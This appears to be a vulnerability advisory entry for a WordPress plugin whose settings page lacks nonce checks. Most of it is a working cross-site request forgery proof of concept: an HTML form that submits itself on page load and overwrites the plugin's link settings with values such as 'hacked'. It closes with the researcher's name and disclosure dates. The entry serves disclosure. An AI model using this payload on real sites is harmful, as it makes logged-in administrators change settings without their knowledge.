The plugin does not implement nonce checks, which could allow attackers to make a logged in admin change settings via a CSRF attack.
<form id="test" action="https://example.com/wp-admin/admin.php?page=lw-settings" method="POST"> <input type="text" name="lw_ops[lw_sidebar]" value="0"> <input type="text" name="lw_ops[lw_sidebarwidget]" value="0"> <input type="text" name="lw_ops[lw_linktype]" value="0"> <input type="text" name="lw_ops[website_id]" value="hacked"> <input type="text" name="lw_ops[website_hash]" value="hacked"> <input type="text" name="lw_ops[billboard_base]" value="pages"> <input type="text" name="lw_ops[lw_linkcolor]" value="1"> <input type="text" name="lw_ops[lw_linksize]" value="12"> <input type="text" name="lw_update_settings" value="Update Settings »"> </form> <script> document.getElementById("test").submit(); </script>
Daniel Ruf
Daniel Ruf
Yes
2022-08-01 (about 10 months ago)
2022-08-01 (about 10 months ago)
2023-04-29 (about 29 days ago)